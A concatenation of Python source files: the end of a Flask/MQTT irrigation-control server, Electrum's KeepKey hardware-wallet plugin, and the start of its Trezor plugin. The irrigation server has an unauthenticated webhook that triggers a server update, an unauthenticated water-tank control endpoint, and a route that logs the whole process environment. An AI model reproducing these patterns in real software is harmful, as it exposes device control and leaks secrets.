.order_by(OasisData.TIMESTAMP.desc())
.first()
)
message = {
"NODE_ID": node_id,
"MESSAGE_ID": "restore",
"CONFIG": config.DATA["DATA"]["NODE"],
}
logger.info(
"[firmware-restore] TIMESTAMP=%s, CONFIG=%s", config.TIMESTAMP, message
)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], json.dumps(message))
return json.dumps(
{"status": "success", "message": "restore request for " + node_id}
)
return json.dumps({"status": "error"}), 403
@app.route("/firmware", methods=["GET"])
@cache.cached()
@login_required
def firmware():
with app.app_context():
time_start = dt.datetime.now()
latest = (
DB.session.query(
OasisData.NODE_ID, func.max(OasisData.TIMESTAMP).label("TIMESTAMP")
)
.group_by(OasisData.NODE_ID)
.subquery("t2")
)
modules = DB.session.query(OasisData).join(
latest,
and_(
OasisData.NODE_ID == latest.c.NODE_ID,
OasisData.TIMESTAMP == latest.c.TIMESTAMP,
),
)
time_end = dt.datetime.now()
elapsed_time = time_end - time_start
logger.debug(
"[database] call database for firmware page took %s secs",
elapsed_time.total_seconds(),
)
return render_template("firmware/firmware.html", modules=modules)
@app.route("/progress")
@login_required
def progress():
logger.info("[firmware] env: %s", os.environ)
# clean
logger.info("[firmware] cleaning arduino firmware")
clean_output = subprocess.check_output(
["make", "-f", ESPMAKE_PARAM, "clean"], cwd=NODE_HOME
)
logger.info("[firmware] %s", clean_output)
# build
logger.info("[firmware] building new arduino firmware")
build_output = subprocess.Popen(
["make", "-f", ESPMAKE_PARAM], cwd=NODE_HOME, stdout=subprocess.PIPE
)
def generate():
x = 0
while x <= 100:
line = build_output.stdout.readline()
yield "data:" + str(x) + "\n\n"
logger.info("[firmware] progress %i: %s", x, line.rstrip())
x = x + 1
return Response(generate(), mimetype="text/event-stream")
app.register_blueprint(about_system)
app.register_blueprint(management)
app.register_blueprint(monitor)
@app.route("/webhook", methods=["POST"])
def webhook():
message = request.get_json()
if message is not None:
logger.info("[webhook] message:%s", message)
committer = message["pusher"]["name"]
commit_message = message["head_commit"]["message"]
logger.info("[webhook] commit:%s author:%s", commit_message, committer)
if (
cfg["MODE"]["AUTO_UPDATE_SERVER"] == True
and message["ref"] == cfg["GIT_BRANCH"]
):
logger.info("[webhook] applying update")
update_server_software()
else:
logger.warn("[webhook] auto updates not applied")
return json.dumps({"status": "request!"})
return json.dumps({"status": "request was ignored!"})
# curl -i -H "Content-Type: application/json" -X POST -d '{"DIRECTION":"IN", "ACTION":false}' http://localhost:8181/water-tank
@app.route("/water-tank", methods=["POST"])
def water_tank():
message = request.get_json()
direction = message["DIRECTION"] # IN or OUT
action = message["ACTION"] # true or false
if cfg["WATER_TANK"]["MODE"] == "support" :
support_data = DB.session.query(SupportData).filter(SupportData.TYPE == "WATER_TANK").one()
#message = json.dumps(request.get_json())
switch = "SWITCH_A" if direction == "IN" else "SWITCH_B"
message = json.dumps({
"NODE_ID": support_data.node_id(),
"MESSAGE_ID": message["MESSAGE_ID"],
"COMMAND": {switch : action}
})
logger.debug("[water-tank command] for %s", message)
mqtt.publish(cfg["MQTT"]["SUPPORT_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
else:
if cfg["WATER_TANK"]["MASTER"]:
logger.info("[water-tank] %s will be %s", direction, action)
if direction == "OUT":
wtm.changeStateWaterTankOut(action)
else:
wtm.changeStateWaterTankIn(action)
return json.dumps({"status": "Success"})
else:
url = "http://%s/water-tank" % (cfg["WATER_TANK"]["SERVER"])
logger.info("[water-tank] remote request. data=%s", message)
response = requests.post(url, json=message)
return response.json()
# curl -X GET http://localhost:8181/water-tank
@app.route("/water-tank", methods=["GET"])
def water_tank_status():
return wtm.get_current_solenoid_status()
@app.route("/irrigation")
@login_required
def standard_irrigation():
irrigation = Irrigation(logger, cfg, mqtt, socketio, oasis_properties)
thread = Thread(target=irrigation.run_standard)
thread.daemon = True
thread.start()
message = {}
message["SOURCE"] = "NABUCODONOSOR"
message["MESSAGE"] = (
"Irrigação foi iniciada manualmente em <b>" + os.uname()[1] + "</b>"
)
TelegramAssistantServer.send_monitor_message(message)
return json.dumps({"irrigation": "Started"})
@app.route("/quarantine", methods=["POST"])
@login_required
def quarantine():
data = request.get_json()
id = data["NODE_ID"]
change = data["QUARANTINE"]
logger.info("[quarantine] changing %s to %i", id, change)
with app.app_context():
DB.session.query(OasisHeartbeat).filter(OasisHeartbeat.NODE_ID == id).update(
{"QUARANTINE": change}
)
DB.session.commit()
message = {}
message["SOURCE"] = "NABUCODONOSOR"
if change:
message["MESSAGE"] = (
"Oasis <b>" + oasis_properties[id]["name"] + "</b> entrou em quarentena"
)
else:
message["MESSAGE"] = (
"Oasis <b>" + oasis_properties[id]["name"] + "</b> saiu de quarentena"
)
TelegramAssistantServer.send_monitor_message(message)
return json.dumps({"status": "Success"})
startup_time = int(time.time())
@app.before_first_request
def notify_telegram_users():
message = {}
message["SOURCE"] = "NABUCODONOSOR"
startup_time_formatted = dt.datetime.fromtimestamp(startup_time).strftime(
"%Y-%m-%d %H:%M:%S"
)
message["MESSAGE"] = (
"Sistema foi reiniciado no servidor <b>"
+ os.uname()[1]
+ "</b> às "
+ startup_time_formatted
)
logger.info("[notify_telegram_users] %s", message["MESSAGE"])
TelegramAssistantServer.send_monitor_message(message)
###############################################################################
################################# PROCESSORS ##################################
###############################################################################
@app.context_processor
def utility_processor():
def format_last_update(value):
return time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(int(value)))
def status_btn_css(argument):
switcher = {0: "btn-primary", 1: "btn-danger"}
return switcher.get(argument, "btn-primary disabled")
def status_btn(argument):
result = ""
if argument == "DISABLED":
result = "disabled"
return result
def status_node(node_id, last_update, sensor_collect_data_period, water):
last_update = int(last_update)
sensor_collect_data_period = 3 * int(sensor_collect_data_period) / 1000
now = int(time.time())
next_data_is_expected = last_update + sensor_collect_data_period
if next_data_is_expected >= now: # NEXT is future
if water:
return "good irrigation"
else:
return "good"
elif QUARANTINE_CACHE[node_id]:
return "quarantine"
else:
return "danger"
def status_moisture(node_id, port, level):
return analytics.status(node_id, port, level)
def value_moisture_mask(node_id, port, level):
return analytics.mask(node_id, port, level)
def weather_icon(argument):
switcher = {
"none": "wi wi-na",
"clear-day": "wi wi-day-sunny",
"clear-night": "wi wi-night-clear",
"rain": "wi wi-rain",
"snow": "wi wi-snow",
"sleet": "wi wi-sleet",
"wind": "wi wi-wind",
"fog": "wi wi-fog",
"cloudy": "wi wi-cloudy",
"partly-cloudy-day": "wi wi-forecast-io-partly-cloudy-day",
"partly-cloudy-night": "wi wi-forecast-io-partly-cloudy-day",
}
return switcher.get(argument, "wi wi-day-sunny")
def translate_name(node_id):
if node_id in oasis_properties:
return oasis_properties[node_id]["name"]
else:
return oasis_properties["oasis-undefined"]["name"]
def description(node_id):
if node_id in oasis_properties:
return oasis_properties[node_id]["desc"]
else:
return oasis_properties["oasis-undefined"]["desc"]
def mux_code(node_id, mux):
if node_id in oasis_properties:
return oasis_properties[node_id][mux]["cod"]
else:
return oasis_properties["oasis-undefined"][mux]["cod"]
def quarantine_icon(argument):
return QUARANTINE_CACHE.get(argument, "")
return {
"status_node": status_node,
"status_moisture": status_moisture,
"value_moisture_mask": value_moisture_mask,
"weather_icon": weather_icon,
"format_last_update": format_last_update,
"status_btn_css": status_btn_css,
"status_btn": status_btn,
"translate_name": translate_name,
"description": description,
"mux_code": mux_code,
"quarantine_icon": quarantine_icon,
}
###############################################################################
############################## HANDLE MQTT ####################################
###############################################################################
# The callback for when the client receives a CONNACK response from the server.
@mqtt.on_connect()
def handle_mqtt_connect(client, userdata, flags, rc):
logger.info("[MQTT] Connected with result code %s", str(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
mqtt.subscribe(cfg["MQTT"]["OASIS_TOPIC_HEARTBEAT"])
mqtt.subscribe(cfg["MQTT"]["OASIS_TOPIC_OUTBOUND"])
mqtt.subscribe(cfg["MQTT"]["SUPPORT_TOPIC_OUTBOUND"])
@mqtt.on_unsubscribe()
def handle_unsubscribe(client, userdata, mid):
logger.info("[MQTT] Unsubscribed from topic %s !!!", str(mid))
@mqtt.on_disconnect()
def handle_disconnect():
logger.info("[MQTT] Disconnected!!!")
# The callback for when a PUBLISH message is received from the server.
@mqtt.on_message()
def handle_mqtt_message(client, userdata, msg):
timestamp = int(time.time())
try:
jmsg = json.loads(msg.payload)
except:
logger.info("[MQTT] Invalid message format %s", msg.payload)
return
node_id = jmsg["NODE_ID"]
topic = msg.topic
if not node_id.startswith("oasis-"):
logger.info("[MQTT] Invalid node_id %s in the topic %s. Message: %s", node_id, topic, jmsg)
return
if topic == cfg["MQTT"]["OASIS_TOPIC_HEARTBEAT"]:
heartbeat = OasisHeartbeat(NODE_ID=node_id, LAST_UPDATE=timestamp)
logger.debug("[heartbeat] %s", heartbeat.toJson())
socketio.emit("ws-oasis-heartbeat", data=heartbeat.toJson())
if isMqttEnabled:
with app.app_context():
merged = DB.session.merge(heartbeat)
QUARANTINE_CACHE[merged.NODE_ID] = merged.QUARANTINE
if topic == cfg["MQTT"]["OASIS_TOPIC_OUTBOUND"]:
data = OasisData(TIMESTAMP=timestamp, NODE_ID=node_id, DATA=jmsg)
if "DATA" in jmsg:
if isMqttEnabled and not QUARANTINE_CACHE[node_id]:
with app.app_context():
# TODO: fixme: somehow this line of code make more stable saving trainning data
dbdata = OasisData(TIMESTAMP=timestamp, NODE_ID=node_id, DATA=jmsg)
DB.session.merge(
dbdata
) # avoid data colision due manual status request
json_data = jmsg["DATA"]
if "CAPACITIVEMOISTURE" in json_data:
moisture = json_data["CAPACITIVEMOISTURE"]
filtered = analytics.gui_noise_filter(node_id, timestamp, moisture)
data.capacitive_moisture(filtered)
logger.debug("[data-filtered] %s", filtered)
json_data = data.toJson()
socketio.emit("ws-oasis-data", data=json_data)
logger.debug("[data] %s", json_data)
if topic == cfg["MQTT"]["SUPPORT_TOPIC_OUTBOUND"]:
if "DATA" in jmsg:
data = SupportData(TIMESTAMP=timestamp, NODE_ID=node_id, DATA=jmsg["DATA"])
if isMqttEnabled:
with app.app_context():
merged = DB.session.merge(data)
SUPPORT_CACHE[merged.NODE_ID] = merged.TYPE
data.TYPE = SUPPORT_CACHE[data.NODE_ID]
logger.debug("[support-data] %s", data.toJson())
socketio.emit("ws-support-data", data=data.toJson())
@mqtt.on_log()
def handle_logging(client, userdata, level, buf):
logger.debug("[MQTT] %i, %s", level, buf)
if level == Mqtt.MQTT_LOG_ERR:
logger.error('[MQTT] Error: client:{} userdata:{} buf:{}'.format(client,userdata, buf))
###############################################################################
############################### SCHEDULE #####################################
###############################################################################
# https://medium.com/better-programming/introduction-to-apscheduler-86337f3bb4a6
sched = BackgroundScheduler(daemon=True)
if cfg["SCHEDULE"]["MOISTURE_MONITOR"] != "never":
def moisture_monitor():
global mqtt
global analytics
global socketio
# sched.print_jobs()
advice = analytics.irrigation_advice()
socketio.emit("ws-server-monitor", data=advice)
logger.info("[moisture_monitor] %s", advice)
# mqtt.publish("/schedule-test", "hellllooo")
moisture_monitor_trigger = CronTrigger.from_crontab(
cfg["SCHEDULE"]["MOISTURE_MONITOR"]
)
sched.add_job(moisture_monitor, moisture_monitor_trigger)
if cfg["SCHEDULE"]["IRRIGATION_BOT"] != "never":
irrigation = Irrigation(logger, cfg, mqtt, socketio, oasis_properties)
irrigation_trigger = CronTrigger.from_crontab(cfg["SCHEDULE"]["IRRIGATION_BOT"])
logger.info("[irrigation] type: %s", cfg["IRRIGATION"]["TYPE"])
if cfg["IRRIGATION"]["TYPE"] == "smart":
sched.add_job(irrigation.run_smart, irrigation_trigger)
elif cfg["IRRIGATION"]["TYPE"] == "dummy":
sched.add_job(irrigation.run_dummy, irrigation_trigger)
else:
sched.add_job(irrigation.run_standard, irrigation_trigger)
if cfg["SCHEDULE"]["IRRIGATION_INSPECTOR"] != "never":
logger.info("[IRRIGATION_INSPECTOR] enabled")
irrigation_inspector_trigger = CronTrigger.from_crontab(cfg["SCHEDULE"]["IRRIGATION_INSPECTOR"])
sched.add_job(irrigation.run_inspector, irrigation_inspector_trigger)
if cfg["SCHEDULE"]["WATCHDOG"] != "never":
logger.info("[watchdog] enabled")
watchdog_trigger = CronTrigger.from_crontab(cfg["SCHEDULE"]["WATCHDOG"])
watchdog = Watchdog(logger, cfg, oasis_properties)
sched.add_job(watchdog.run, watchdog_trigger)
sched.start()
###############################################################################
################################## START #####################################
###############################################################################
update_quarantine_cache()
update_support_cache()
if __name__ == "__main__":
print("")
print(" __ __ _ __ _ ")
print(" / /_ ____ _ / /_ (_)/ /____ ____ (_)____ _")
print(" / __ \ / __ `// __ \ / // // __ \ / __ \ / // __ `/")
print(" / /_/ // /_/ // /_/ // // // /_/ // / / // // /_/ / ")
print("/_.___/ \__,_//_.___//_//_/ \____//_/ /_//_/ \__,_/ ")
print("")
logger.info("*** STARTING NABUCODONOSOR SYSTEM ***")
logger.info("version: %s", VERSION)
# from werkzeug.middleware.profiler import ProfilerMiddleware
# app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[5], profile_dir='./profile')
user_reload = False # Avoid Bug: TWICE mqtt instances
socketio.run(
app,
host="0.0.0.0",
port=8181,
debug=cfg["MODE"]["DEBUG"],
use_reloader=user_reload,
)
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException,
get_xpubs_and_der_suffixes_from_txinout)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
Capability, BackupType, RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
class _EnumMissing:
def __init__(self):
self.counter = 0
self.values = {}
def __getattr__(self, key):
if key not in self.values:
self.values[key] = self.counter
self.counter += 1
return self.values[key]
Capability = _EnumMissing()
BackupType = _EnumMissing()
RecoveryDeviceType = _EnumMissing()
PASSPHRASE_ON_DEVICE = object()
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
plugin: 'TrezorPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
backup_type: int = BackupType.Bip39
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
